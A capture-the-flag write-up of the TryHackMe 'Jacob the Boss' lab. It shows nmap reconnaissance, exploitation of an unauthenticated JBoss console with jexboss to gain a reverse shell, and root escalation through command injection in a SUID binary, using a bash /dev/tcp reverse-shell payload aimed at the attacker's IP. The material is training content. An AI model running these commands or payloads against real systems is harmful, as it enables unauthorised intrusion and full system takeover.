Sep 15, 2020
Overview
Brief techniqual writeup explaining how we got a full access on Jacob the Boss machine from tryhackme
Target Informations
Externally accessible :
- IP ADDRESS : 10.10.7.212
- DOMAIN NAME : jacobtheboss.thm - jacobtheboss.box
DISCOVERY & RECONNAISSANCE
As the first step of this engagement, i’ll start with an nmap scan including default script and services version enumeration.
m3dsec@local:~/jacobtheboss.thm$ nmap -v -sC -sV -oN nmap/nmap_tcp_simple 10.10.7.212
Nmap scan report for jacobtheboss.thm (10.10.173.140)
Host is up (0.096s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 82:ca:13:6e:d9:63:c0:5f:4a:23:a5:a5:a5:10:3c:7f (RSA)
| 256 a4:6e:d2:5d:0d:36:2e:73:2f:1d:52:9c:e5:8a:7b:04 (ECDSA)
|_ 256 6f:54:a6:5e:ba:5b:ad:cc:87:ee:d3:a8:d5:e0:aa:2a (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.3.20)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.3.20
|_http-title: My first blog
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
1090/tcp open java-rmi Java RMI
|_rmi-dumpregistry: ERROR: Script execution failed (use -d to debug)
1098/tcp open java-rmi Java RMI
1099/tcp open java-object Java Object Serialization
| fingerprint-strings:
| NULL:
| java.rmi.MarshalledObject|
| hash[
| locBytest
| objBytesq
| http://jacobtheboss.box:8083/q
| org.jnp.server.NamingServer_Stub
| java.rmi.server.RemoteStub
| java.rmi.server.RemoteObject
| xpw;
| UnicastRef2
|_ jacobtheboss.box
3306/tcp open mysql MariaDB (unauthorized)
4444/tcp open java-rmi Java RMI
4445/tcp open java-object Java Object Serialization
4446/tcp open java-object Java Object Serialization
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
| Supported methods: GET HEAD POST PUT DELETE TRACE OPTIONS
| Potentially risky methods: PUT DELETE TRACE
|_ See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Unknown favicon MD5: 799F70B71314A7508326D1D2F68F7519
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE TRACE OPTIONS
|_ Potentially risky methods: PUT DELETE TRACE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Welcome to JBoss™
8083/tcp open http JBoss service httpd
|_http-title: Site doesn't have a title (text/html).
Full ports scan up to 65515 is also a must.
m3dsec@local:~/jacobtheboss.thm$ nmap -v -p- -T4 -oN nmap/nmap_tcp_full 10.10.7.212
Nmap scan report for jacobtheboss.thm (10.10.173.140)
Host is up (0.085s latency).
Not shown: 65515 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
1090/tcp open ff-fms
1098/tcp open rmiactivation
1099/tcp open rmiregistry
3306/tcp open mysql
3873/tcp open fagordnc
4444/tcp open krb524
4445/tcp open upnotifyp
4446/tcp open n1-fwp
4457/tcp open prRegister
4712/tcp open unknown
4713/tcp open pulseaudio
8009/tcp open ajp13
8080/tcp open http-proxy
8083/tcp open us-srv
36369/tcp open unknown
38395/tcp open unknown
47073/tcp open unknown
without any further enumeration the JBoss http service deployed on port 8083 Took my attention.
Validation & Exploitation
using the results of the reconnaissance as a starting point, and walking through the JBoss environment, we discovered that the JMX Console is beying deployed with no credentials. therefor we can upload and publish Web application ARchive (WAR) files remotely through this admin console, and compromize the network.
we selectively chosed jexboss tool to automate the Exploitation part.
m3dsec@local:~/jacobtheboss.thm$ python ~/Tools/web_pentesting/jexboss/jexboss.py -host http://jacobtheboss.box:8080/
** Checking Host: http://jacobtheboss.box:8080/ **
[*] Checking admin-console: [ OK ]
[*] Checking Struts2: [ OK ]
[*] Checking Servlet Deserialization: [ OK ]
[*] Checking Application Deserialization: [ OK ]
[*] Checking Jenkins: [ OK ]
[*] Checking web-console: [ VULNERABLE ]
[*] Checking jmx-console: [ VULNERABLE ]
[*] Checking JMXInvokerServlet: [ VULNERABLE ]
* Sending exploit code to http://jacobtheboss.box:8080/. Please wait...
* Please enter the IP address and tcp PORT of your listening server for try to get a REVERSE SHELL.
OBS: You can also use the --cmd "command" to send specific commands to run on the server.
IP Address (RHOST): 10.9.123.226
Port (RPORT): 9991
we successfully exploited the vulnerability in JBoss to get remote code execution and obtain a shell with user jacob privileges.
[jacob@jacobtheboss tmp]$ id
uid=1001(jacob) gid=1001(jacob) groups=1001(jacob) context=system_u:system_r:initrc_t:s0
Internal Enumeration
With an interactive access to the underlying OS on our target network, we continued with the examination of the system searching for ways to escalate privileges to the root level. We found a SUID file:
[jacob@jacobtheboss /]$ find / -perm -4000 -user root 2>/dev/null
/usr/bin/pingsys <<---
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/mount
/usr/bin/chage
/usr/bin/umount
/usr/bin/crontab
/usr/bin/pkexec
/usr/bin/passwd
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/usernetctl
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/dbus-1/dbus-daemon-launch-helper
Transferring the binary file Locally for a further analysis.
[jacob@jacobtheboss /]$ scp /usr/bin/pingsys m3dsec@10.9.123.226:/home/m3dsec/jacobtheboss.thm/files/pingsys
Reverse Engeneering the binary shows that its taking arguments from the user.
0x00400616 897ddc mov dword [var_24h], edi ; argc
0x00400619 488975d0 mov qword [var_30h], rsi ; argv
and droping the user UID to 0 (root)
0x004006a5 bf00000000 mov edi, 0
0x004006aa e861feffff call sym.imp.setuid
Then passing those arguments into system() function for execution.
0x004006c3 488b45e0 mov rax, qword [var_20h]
0x004006c7 4889c7 mov rdi, rax
0x004006ca e8f1fdffff call sym.imp.system ; int system(const char *string)
we can conclude that the SUID Binary file is vulnerble to Command injection.
ROOT - Privilege escalation
we can easly spawn a reverse shell, by injecting our payload in the arguments.
[jacob@jacobtheboss /]$ /usr/bin/pingsys '127.0.0.1;/bin/bash -i > /dev/tcp/10.9.123.226/9991 0>&1 2>&1'
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.017 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.032 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.033 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.031 ms
--- 127.0.0.1 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 2999ms
rtt min/avg/max/mdev = 0.017/0.028/0.033/0.007 ms
And we successfully gained a root interactive shell on the compromised host.
m3dsec@local:~/jacobtheboss.thm$ nc -vnlp 9991
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9991
Ncat: Listening on 0.0.0.0:9991
Ncat: Connection from 10.10.9.96.
Ncat: Connection from 10.10.9.96:36850.
[root@jacobtheboss /]# id
uid=0(root) gid=1001(jacob) groups=1001(jacob) context=system_u:system_r:initrc_t:s0
[root@jacobtheboss /]# cat /root/root.txt
29a5641e************************
Best Regards